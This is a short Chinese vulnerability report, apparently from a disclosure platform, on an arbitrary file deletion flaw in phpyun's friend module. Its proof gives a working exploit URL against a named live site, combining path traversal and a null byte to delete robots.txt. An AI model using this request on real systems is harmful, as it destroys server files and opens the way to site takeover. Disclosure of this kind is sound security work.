### 简要描述:

只要有任意文件删除 这系统绝对崩。

我吐个槽,最新的过滤文件实在是太BT了,只要有select and .... 就die()

伤不起啊

### 详细说明:

问题出在 friend\model\index.class.php

[](https://images.seebug.org/upload/201401/0119250873aadf723cab3eb6a38f52ad7625cdfa.jpg)

[](https://images.seebug.org/upload/201401/01192734913d89637618e20dc388128d83ee7a80.jpg)

### 漏洞证明:

1.注册个用户

2.访问 http://www.hr135.com/friend/index.php?C=save_avatar&task=save_avatar&type=big/../../../robots.txt%00&photoServer=http://www.hr135.comhttps://images.seebug.org/upload/friend/20140101/13887792315.JPG&from=icon&photoId=13887792315.JPG

访问2次,因为第一次 没有update到表里面 第二次查询出来 就删除了.

很抱歉 把robots.txt 删除了测试而已

php任意文件删除漏洞,phpyun二次任意文件删除漏洞相关推荐

  1. 如何更改linux文件权限设置,linux文件权限学习笔二——如何修改文件权限(chgrp,chown,chmod)...

    linux文件权限学习随笔二--如何修改文件权限 一.修改文件所属组群--chgrp 修改文件所属组群很简单-chgrp命令,就是change group的缩写(我们可以利用这些来记忆命令) 语法:c ...

  2. python自动化上传文件_python接口自动化测试二十三:文件上传

    # 以禅道为例: 一.创建一个类,类里面写一个登录方法: import requests class LoginZentao(): def __init__(self, s): # 初始化 self. ...

  3. linux删除文件夹提示没找到,Win10中遇到删除文件夹提示找不到该项目的解决过程...

    今天删一文件夹,结果提示找不到该项目,百度找到的解决方法如下: 方法一:rd /s /q 被删除文件夹路径 方法二:360文件粉碎器 经测试以上方法全部无效,又试了下面的方法 方法一:下载powert ...

  4. android分享文件分享结果_干货分享丨DM删除归档日志文件的多种方法

    上一期我们讲解了DM数据库归档日志的切换,本期我们讲解DM数据库归档日志文件的删除. 本章内容已在如下环境上测试: ①操作系统:中标麒麟7: ②数据库版本:达梦8: 相关关键字:DM数据库.归档日志文 ...

  5. 服务器c盘logs文件夹,Win10系统Logs文件夹有什么作用?Logs文件夹可以删除吗?

    Windows系统中一般都会有一个Logs文件夹,它能够记载系统运行的一些记录,我们可以使用记事本将它打开.最近,有Win10系统的用户,在查看电脑的时候发现有一个Logs文件夹,不知道Logs文件夹 ...

  6. 服务器default文件夹可以删除吗,C盘用户文件夹里的Default是什么文件夹,有什么用,能删除么?...

    C盘用户文件夹里的Default是什么文件夹,有什么用,能删除么?见怪不怪,其怪自败!偏偏很多人和笔者一样好奇心重!对这个问题穷追猛打,网上相关资料很少,笔者搜集整理了下面的内容,如果对您有微末的帮助 ...

  7. 数据压缩(二)——PNG文件结构分析

    一.PNG文件简介 PNG(Portable Network Graphics)即便携式网络图形,是一种采用无损压缩算法的位图片形格式,其设计目的是试图代替GIF和TIFF文件格式,同时增加一些GIF ...

  8. oracle 删除主键_大数据量删除的思考 4

    译者  汤健 · 沃趣科技数据库技术专家 出品  沃趣科技 在本系列的前一期文章中,我制作了一些图,突出显示了按表扫描执行大量删除操作和按索引范围扫描执行大量删除之间的主要区别.根据所涉及的数据模式, ...

  9. php任意文件删除漏洞,myblog/phpyun4.3任意文件删除漏洞.md at master · source-trace/myblog · GitHub...

    phpyun-expect.class.php任意文件 漏洞信息 公开时间: 2017/08 影响版本: 4.3 利用难度: 2 挖掘难度: 2 漏洞说明 漏洞出现的原因是在于没有对数据进行很好的校验 ...

最新文章

  1. 大牛告诉你,只有突破程序员思维,才不会沦为码农!
  2. 给array添加元素_前囧(06篇)Array 方法详解
  3. MDK linker和debug的设置以及在RAM中调试
  4. linux输入法小结
  5. 常见面试算法:决策树、随机森林和AdaBoost
  6. C++ STL inner_product函数的使用方法
  7. flutter环境配置详解及开发第一个项目
  8. ISA2000资料大全(详细)
  9. vbs整人代码蓝屏_求大量VBS整人代码.
  10. 如何在linux系统上安装wine来运行.exe文件
  11. 全球及中国汽车零部件用模塑料行业盈利预测及投资前景分析报告2021年版
  12. Elasticsearch: collapse 去重
  13. android摄氏度转为华氏温度
  14. MIPI CSI-2笔记(16) -- 数据格式(YUV图像数据)
  15. 暴雪修改手机500服务器错误,改造:500内部服务器错误
  16. 【python】数组内某数加一如何实现?
  17. 点击按钮播放声音简单实现。
  18. 数据分析入门学习指南|零基础小白必看
  19. Linux命令之在终端显示「一头牛」
  20. SINUMERIK西门子828D/840Dsl数控系统数据采集方法与IP地址参数设定

热门文章

  1. UPDATE和DELETE
  2. STM32中断优先级NVIC
  3. 方案设计-实现地图导航
  4. JAVA base64的PNG格式转JPG
  5. 总结哪些因素影响谷歌排名
  6. C Primer Plus课后习题
  7. 安卓逆向基础实战----1.修改APK图标名称
  8. linux awk统计文本单词,shell统计文本中单词的出现次数
  9. Unity3D游戏开发最佳实践技巧
  10. AUC值越大_AUC,ROC 讲解